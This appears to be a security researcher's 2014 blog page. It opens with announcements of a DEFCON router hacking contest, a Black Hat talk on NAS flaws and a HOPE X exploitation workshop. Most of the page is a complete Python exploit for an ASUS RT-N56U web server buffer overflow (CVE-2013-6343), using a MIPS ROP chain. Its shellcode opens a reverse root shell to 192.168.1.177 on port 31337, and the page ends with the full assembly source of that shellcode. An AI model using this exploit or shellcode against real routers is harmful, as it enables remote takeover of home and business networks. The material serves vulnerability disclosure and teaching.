Friday, July 25, 2014

SOHOpelessly Broken - DEFCON Router Hacking Contest

http://sohopelesslybroken.com/

This year at DEFCON 22, for the first time ever Independent Security Evaluators (ISE) and the Electronic Frontier Foundation (EFF) are hosting a no-holds-barred router hacking competition. You're hereby challenged to compete in one or both tracks of the SOHOpelessly BROKEN contest


HACK AND GET PAID! #SOHOpelesslyBroken

Monday, June 23, 2014

[Black Hat USA 2014] Lets get N.A.S.ty at my BH briefing!

Register for Black Hat USA 2014!!

Jacob Holcomb

Independent Security Evaluators

Residing in Baltimore, MD, Jacob works as a Security Analyst for Independent Security Evaluators. At ISE, Jacob works on projects that involve penetration testing, application security, network security, and exploit research and development. In addition to projects at work, coding, and his favorite pastime of EIP hunting, Jacob loves to hack his way through the interwebz and has responsibly disclosed several 0-day vulnerabilities in commercial products.


Network Attached Shell: N.A.S.ty Systems that Store Network Accessible Shells

Through extensive analysis, Independent Security Evaluators (ISE) has identified dozens of previously undisclosed, critical security vulnerabilities in numerous network storage devices from a handful of goto manufacturers (manufacturers: e.g., Seagate, D-Link, Netgear). Vulnerabilities of network-attached storage not only expose stored data, but also provide a vantage point for further PWNAGE of the network infrastructure on which the storage system sits. Our research efforts focused on identifying vulnerabilities that obtained administrative access (such as command injection, directory traversal, authentication bypass, memory corruption, backdoors, etc.), and quantifying the associated risk.

The attacks we developed demonstrate how unauthenticated attackers can compromise and control storage systems with and without user interaction.

Network based storage systems are used in millions of homes, schools, government agencies, and businesses around the world for data storage and retrieval. With today's dependence on Internet based services, virtualization technologies, and the need to access data from anywhere, storage systems are relied on more than ever. Similar to other network hardware (e.g., routers), these devices are purchased and installed by IT teams and home consumers with the expectation that the system is protected from the infamous hacker.

This presentation focuses on "how to," and the implications of compromising network based storage systems, but will conclude that the absence of security in not only storage hardware, but networking hardware in general, has left data unprotected and millions of networks vulnerable to exploitation.

Throughout this presentation, several vulnerabilities will be exploited in order to achieve the glorious ro0t (#) shell!

Black Hat - https://www.blackhat.com/us-14/speakers/Jacob-Holcomb.html

Sunday, June 22, 2014

HOPE X Workshop

HOPE X


I will be teaching an application security workshop at HOPE X, and hope to see you there!

Workshop Title - Extensively Adaptable Sploits and Tools for Encroaching on Router Security
Details


* Extensively Adaptable Sploits and Tools for Encroaching on Router Security will teach attendees penetration testing methodology for testing the security of SOHO routers. This workshop will provide an overview of application security issues commonly found in routers, demonstrate how attackers exploit these issues, and enlighten attendees on common methods used to remediate critical system deficiencies. Throughout this course, attendees will learn the skills necessary to discoverer vulnerabilities and develop custom, reliable exploits.

After attending this workshop, attendees should be more comfortable performing penetration tests against networked systems and discovering vulnerabilities ranging in criticality (i.e., information disclosures to remote code execution).

* Information Gathering
* Discovering and documenting system settings from black and white box perspectives.
* Scanning and Service Enumeration
* Service discovery and verification
* Services enumeration
* Gaining Access
* Analyze web applications
* What to look for
* Tools and Techniques
* Analyze network servers (e.g., FTP, SMB, HTTP)
* What to look for
* Tools and Techniques
* Static Code Analysis (Source Code Review)
* What to look for
* Tools and Techniques
* Dynamic Analysis (Network Service Fuzzing)
* What to look for
* Tools and Techniques
* Reverse Engineering
* What to look for
* Tools and Techniques
* Exploit Development
* Web Application Vulnerability Overview
* OWASP Top 10
* Application Vulnerability Overview
* Buffer Overflows
* Directory Traversal
* Insecure Cryptographic Storage
* Authentication and Authorization
* Misconfigurations
* Information Disclosure
* Social Engineering Overview
* Maintaining Access
* Responsible Vulnerability Disclosure

This workshop emphasizes the “how to” aspect of application security and exploit development. Attendees will be provided with sample binaries for exercises that will be conducted during the workshop, and access to a lab of networked routers where newly learned skills can be applied.

1. Attendees will learn how to discover, exploit, and mitigate vulnerabilities found in network-based equipment. This workshop will focus on exploiting vulnerabilities in routers, but the methodologies presented are applicable to other hardware platforms as well.

2. Attendees will become acquainted with with numerous types application and web application vulnerabilities


Who is the workshop intended for?

* This workshop is suited for a broad range of security professionals, from systems engineers, to those performing security assessments with intermediate to advanced computer science skill sets. This is a fast paced workshop that starts off catering to inexperienced information security professionals by providing a general overview of common vulnerabilities and how they can exploited, but then quickly moves into more advanced topics such as using return-oriented programming (ROP) to exploit stack-based buffer overflows on the MIPS architecture.

Attendees must be familiar with Linux, web attacks (OWASP Top 10), memory corruption attacks (specifically stack-based buffer overflows), and using the command line! Additionally, attendees need be comfortable writing code for proof-of-concept attacks, and reading source code written in various programming languages such as JavaScript and C.

Duration:   3.5 hours
Material cost:  none
Anything for participants to bring?
* Attendees will need a laptop that is capable of running virtual machines and accessing the Internet.
* An updated Kali Linux installation (i.e., a Kali Linux virtual machine configured to use bridge mode networking or a native Kali Linux install).
* The latest version of statically linked Qemu installed on Kali Linux (qemu-user-static).


Workshop Slides - http://securityevaluators.com/knowledge/presentations/HOPEX_HOLCOMB.pdf

Sunday, January 19, 2014

[Exploit] ASUS RT-N56U Remote Root Shell Buffer Overflow


From its hardened state, the RT-N56U runs an HTTP server on port TCP/80. This HTTP server is vulnerable to multiple buffer overflow attacks during the command processing routine (CVE-2013-6343) of the media application configuration and installation process. In the same fashion that Broadcom ACSD was exploited, an attacker can connect to the HTTPD service and submit a command string that is larger than the program’s fixed length buffer. Upon doing so, the attacker will have corrupted the HTTP servers call stack and have altered the execution flow of the program.

The RT-N56U exploit utilizes return oriented programming (ROP) to circumvent stack randomization, but does not need to cause a context switch by calling the sleep() function. At the time of code execution, the RT-N56U has already performed a context switch and written the d-cache (data cache) back to RAM. Because of this condition, the RT-N56U exploit utilizes a call to sched_yield(), which relinquishes the CPU to a ready to run process (if one exists) with a greater than or equal to execution priority of the HTTPD process.

Finally, I direct the program’s execution to custom shellcode residing on the programs call-stack, which when executed, connects back to the attackers machine on TCP/31337 and spawns a root system shell.



#!/usr/bin/env python

from time import sleep
from sys import exit
import urllib2, signal, struct, base64, socket, ssl

# [*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
# [*] Discovered and Reported: October 2013
# [*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
# [*] Contact: Twitter - @rootHak42
# [*] Software Vendor: http://asus.com
# [*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
# [*] Software: httpd (Listens on TCP/80 and TCP/443)
# [*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
# [*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343
#
# [*] Overview:
#       Multiple ASUS routers including the RT-N56U and RT-AC66U have the ability to install
#       supplemental applications. This install process is handled by the routers web server,
#       and is susceptible to multiple Buffer Overflow attacks.
#
#       Vulnerable Web Page: APP_Installation.asp
#       Vulnerable HTML Parameters: apps_name, apps_flag
#       Vulneralbe Source File: web.c of httpd code
#       *Firmware versions prior to the tested version were vulnerable to this attack.
#


def fingerPrint(host, port, netSock):

    fprint = ["RT-N56U"]
    found = None
    print " [*] Preparing to fingerprint the server."
    try:
        print " [*] Connecting to %s on port %d." % (host, port)
        netSock.connect((host, port))
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print " [*] Sending fingerprint request."
        netSock.send("HEAD / HTTP/1.1\r\n\r\n")
        netData = netSock.recv(1024)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print " [*] Closing network socket.\n"
        netSock.close()
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)

    for item in fprint:
        if item in netData:
            print " [!!!] Target system found in signature list - Result: %s [!!!]\n" % item
            sleep(1)
            found = item
    if found == None:
        print " [!!!] Server banner doesn't match available targets. [!!!]\n"
        sleep(1)
        exit(0)
    else:
        return found


def targURL():

    while True:
  
        URL = raw_input("\n[*] Please enter the URL of the router. Ex. http://192.168.1.1\n>")
        if len(URL) != 0 and URL[0:7] == "http://" or URL[0:8] == "https://":
            return URL.lower()
        else:
            print "\n\n [!!!] Target URL cant be null and must contain http:// or https:// [!!!]\n"
            sleep(1)


def creds():

    while True:

        User = raw_input("\n[*] Please enter the username for the routers HTTP Basic Authentication:\n>")
        Pass = raw_input("\n[*] Please enter the password for the supplied username:\n>")
        if len(User) != 0:
            return User, Pass
        else:
            print "\n [!!!] Username cant be null [!!!]\n"
            sleep(1)


def basicAuth():

    auth = None

    while auth != "yes" and auth != "no":
        auth = raw_input("\n[*] Would you like to use HTTP Basic Authentication? \"yes\" or \"no\"\n>")

        if auth.lower() == "yes":
            print "\n\n[!!!] You chose to use HTTP Basic Authentication [!!!]\n"
            sleep(1)
            User, Pass = creds()
            return base64.encodestring("%s:%s" % (User, Pass)).replace("\n", "")
        elif auth.lower() == "no":
            print "\n\n[!!!] You chose not to use HTTP Basic Authentication. [!!!]\n"
            sleep(1)
            return 0
        else:
            print "\n\n[!!!] Error: You entered %s. Please enter \"yes\" or \"no\"! [!!!]\n" % auth
            sleep(1)


def sigHandle(signum, frm): # Signal handler
   
    print "\n\n[!!!] Cleaning up the exploit... [!!!]\n"
    sleep(1)
    exit(0)


def main():

    print """\n[*] Title: ASUS RT-N56U Remote Root Shell Exploit - apps_name
[*] Discovered and Reported: October 2013
[*] Discovered/Exploited By: Jacob Holcomb/Gimppy - Security Analyst @ ISE
[*] Contact: Twitter - @rootHak42
[*] Software Vendor: http://asus.com
[*] Exploit/Advisory: http://securityevaluators.com, http://infosec42.blogspot.com/
[*] Software: httpd (Listens on TCP/80 and TCP/443)
[*] Tested Firmware Versions: 3.0.0.4.374_979 (Other versions may be vulnerable)
[*] CVE: ASUS RT-N56U Buffer Overflow: CVE-2013-6343\n"""
    signal.signal(signal.SIGINT, sigHandle) #Setting signal handler for ctrl + c

    target = targURL()
    try:
        print "\n [*] Creating network socket"
        netSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        if target[0:5] == "https":
            host = target[8:]
            port = 443
            print " [*] Preparing SSL/TLS support."
            https_netSock = ssl.wrap_socket(netSock)
            finger = fingerPrint(host, port, https_netSock)
        else:
            host = target[7:]
            port = 80
            finger = fingerPrint(host, port, netSock)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    auth = basicAuth()
    junk = "\x42" * 109
    link_nop = "2Aa3"

    #Base address of ld_uClibc and libc in httpd address space
    ld_uClibcBase = 0x2aaa8000
    libcBaseAddr = 0x2ab5f000

    #Rop Chain
    #<chown+68>:   move    v0,s0 -> sched_yield()
    #<chown+72>:   lw  ra,28(sp) -> Rop2
    #<chown+76>:   lw  s0,24(sp)
    #<chown+80>:   jr  ra
    #<chown+84>:   addiu   sp,sp,32
    saved_ra1 = struct.pack("<L", libcBaseAddr + 0x73f4)

    #<_dl_runtime_pltresolve+68>:  lw  ra,36(sp) -> Rop 3
    #<_dl_runtime_pltresolve+72>:  lw  a0,16(sp)
    #<_dl_runtime_pltresolve+76>:  lw  a1,20(sp)
    #<_dl_runtime_pltresolve+80>:  lw  a2,24(sp)
    #<_dl_runtime_pltresolve+84>:  lw  a3,28(sp)
    #<_dl_runtime_pltresolve+88>:  addiu   sp,sp,40
    #<_dl_runtime_pltresolve+92>:  move    t9,v0
    #<_dl_runtime_pltresolve+96>:  jr  t9 -> jump sched_yield()
    #<_dl_runtime_pltresolve+100>: nop
    saved_ra2 = struct.pack("<L", ld_uClibcBase + 0x4e94)

    #<setrlimit64+144>:    addiu   a1,sp,24 -> ptr to stack
    #<setrlimit64+148>:    lw  gp,16(sp)
    #<setrlimit64+152>:    lw  ra,32(sp) -> Rop 4
    #<setrlimit64+156>:    jr  ra -> jump Rop 4
    #<setrlimit64+160>:    addiu   sp,sp,40
    saved_ra3 = struct.pack("<L", libcBaseAddr + 0x9ce0)

    #move    t9,a1 -> ptr to jalr sp on stack
    #addiu   a0,a0,56
    #jr      t9 -> jump to stack
    #move    a1,a2
    saved_ra4 = struct.pack("<L", libcBaseAddr + 0x308fc)

    #sched_yield()
    sch_yield_s0 = struct.pack("<L", libcBaseAddr + 0x94b0)
 
    #Stage 1 Shellcode
    jalr_sp =  "\x09\xf8\xa0\x03"

    #Stage 2 Shellcode (Stack Pivot) by Jacob Holcomb of ISE
    stg2_SC = "\x2c\x08\xbd\x27"# addiu sp, sp, 2092
    stg2_SC += "\x09\xf8\xa0\x03"# jalr sp
    stg2_SC += "\x32\x41\x61"#filler for link (branch delay)

    #Stage 3 Shellcode
    #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE
    #Connects on 192.168.1.177:31337
    stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
    stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
    stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
    stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
    stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
    stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
    stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
    stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
    stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
    stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01"

    payload =  junk + sch_yield_s0 + junk[0:12] + saved_ra1 + junk[0:32]
    payload += saved_ra2 + junk[0:36] + saved_ra3 + junk[0:24] + jalr_sp
    payload += link_nop + saved_ra4 + junk[0:4] + stg2_SC
    postData = "apps_action=install&apps_path=&apps_name=%s&apps_flag=sdb1" % payload

    try:
        print "\n [*] Preparing the malicious web request."
        httpRequest = urllib2.Request("%s/APP_Installation.asp" % target, data = postData)
        httpRequest.add_header("Cookie", "hwaddr=" + junk[0:35] + stg3_SC + "\x42" * (265 - len(stg3_SC)))
        if auth != 0:
            httpRequest.add_header("Authorization", "Basic %s" % auth)
        print " [*] Successfully built HTTP POST request."

    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)

    try:
        print """ [*] Preparing to send Evil PAYLoAd to %s on port %d!\n [*] Payload Length: %d
 [*] Waiting...""" % (host, port, len(payload))
        sploit = urllib2.urlopen(httpRequest, None, 6)
        if sploit.getcode() == 200:
            print " [*] Server Response: HTTP 200 OK. Get ready 2 catch roOt on TCP/31337!"
        else:
            print " [*] Server Response: HTTP %d. Something went wrong!" % sploit.getcode()

    except(urllib2.URLError) as error:
        print "\n [!!!] Web request error! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    except Exception as error:
        print "\n [!!!] ERROR! %s %s [!!!]\n\n" % (type(error), error)
        exit(0)
    finally:
        print " [*] %s exploit code has finished.\n" % finger

if __name__ == "__main__":
    main()   

Sunday, November 3, 2013

[Shellcode] MIPS Little Endian Reverse Shell Shellcode (Linux)

# MIPS Little Endian Reverse Shell ASM File and Assembled Shellcode
# Written by Jacob Holcomb, Security Analyst @ Independent Security Evaluators
# Blog: http://infosec42.blogspot.com
# Company Website: http://securityevaluators.com


--G42_MIPS_rev_shell.s-- 


    .data

    .bss

    .text

    .globl _start

_start:

    #Close stdin(0)
    slti $a0, $zero, 0xFFFF
    li $v0, 4006
    syscall 0x42424

    #Close stdout(1)
    slti $a0, $zero, 0x1111
    li $v0, 4006
    syscall 0x42424

    #Close stderr(2)
    li $t4, 0xFFFFFFFD #-3
    not $a0, $t4
    li $v0, 4006
    syscall 0x42424

    #Socket Domain - AF_INET (2)
    li $t4, 0xFFFFFFFD #-3
    not $a0, $t4
    #Socket Type - SOCK_STREAM (2 for mips)
    not $a1, $t4
    #Socket Protocol - 0
    slti $a2, $zero, 0xFFFF
    #Call socket
    li $v0, 4183
    syscall 0x42424

    #Move socket return value (v0) to register a0
    #V0 must be below 0xFFFF/65535
    andi $a0, $v0, 0xFFFF

    #Calling dup three times
    #Duplicate FD (stdin)
    #Socket returned fd 0 - stdin goes to socket
    #-----
    #Duplicate FD (stdout)
    li $v0, 4041
    syscall 0x42424
    #Duplicate FD (stderr)
    li $v0, 4041
    syscall 0x42424

    #Connect sockfd
    #Socket FD is already in a0
    #-----
    #Connect sockaddr
    lui $a1, 0x6979 #Port:
    ori $a1, 0xFF01 #31337
    addi $a1, $a1, 0x0101
    sw $a1, -8($sp)

    li $a1, 0xB101A8C0 #192.168.1.177
    sw $a1, -4($sp)
    addi $a1, $sp, -8

    #Connect addrlen - 16
    li $t4, 0xFFFFFFEF #-17
    not $a2, $t4
    #Call connect
    li $v0, 4170
    syscall 0x42424

    #Putting /bin/sh onto the stack
    lui $t0, 0x6962 #Loading Upper Immediate - ib
    ori $t0, $t0,0x2f2f #Bitwise OR Immediate - //
    sw $t0, -20($sp) #Store word pointer to command string for execution
    #
    lui $t0, 0x6873 #Loading Upper Immediate - hs
    ori $t0, 0x2f6e #Bitwise OR Immediate - /n
    sw $t0, -16($sp) #Store word pointer to command string for execution
    #
    slti $a3, $zero, 0xFFFF #Putting null (0) onto stack
    sw $a3, -12($sp)
    sw $a3, -4($sp)

    #execve *filename
    addi $a0, $sp, -20
    #execve *argv[]
    addi $t0, $sp, -20
    sw $t0, -8($sp)
    addi $a1, $sp, -8
    #
    addiu $sp, $sp, -20 #Adjusting stack 
    #
    #execve envp[] - 0
    slti $a2, $zero, 0xFFFF
    #Call execve
    li $v0, 4011
    syscall 0x42424




# NOTE: Assembled shellcode
#
#    #200 byte Linux MIPS reverse shell shellcode by Jacob Holcomb of ISE
#    #Connects on 192.168.1.177:31337
#    stg3_SC = "\xff\xff\x04\x28\xa6\x0f\x02\x24\x0c\x09\x09\x01\x11\x11\x04\x28"
#    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
#    stg3_SC += "\xa6\x0f\x02\x24\x0c\x09\x09\x01\xfd\xff\x0c\x24\x27\x20\x80\x01"
#    stg3_SC += "\x27\x28\x80\x01\xff\xff\x06\x28\x57\x10\x02\x24\x0c\x09\x09\x01"
#    stg3_SC += "\xff\xff\x44\x30\xc9\x0f\x02\x24\x0c\x09\x09\x01\xc9\x0f\x02\x24"
#    stg3_SC += "\x0c\x09\x09\x01\x79\x69\x05\x3c\x01\xff\xa5\x34\x01\x01\xa5\x20"
#    stg3_SC += "\xf8\xff\xa5\xaf\x01\xb1\x05\x3c\xc0\xa8\xa5\x34\xfc\xff\xa5\xaf"
#    stg3_SC += "\xf8\xff\xa5\x23\xef\xff\x0c\x24\x27\x30\x80\x01\x4a\x10\x02\x24"
#    stg3_SC += "\x0c\x09\x09\x01\x62\x69\x08\x3c\x2f\x2f\x08\x35\xec\xff\xa8\xaf"
#    stg3_SC += "\x73\x68\x08\x3c\x6e\x2f\x08\x35\xf0\xff\xa8\xaf\xff\xff\x07\x28"
#    stg3_SC += "\xf4\xff\xa7\xaf\xfc\xff\xa7\xaf\xec\xff\xa4\x23\xec\xff\xa8\x23"
#    stg3_SC += "\xf8\xff\xa8\xaf\xf8\xff\xa5\x23\xec\xff\xbd\x27\xff\xff\x06\x28"
#    stg3_SC += "\xab\x0f\x02\x24\x0c\x09\x09\x01"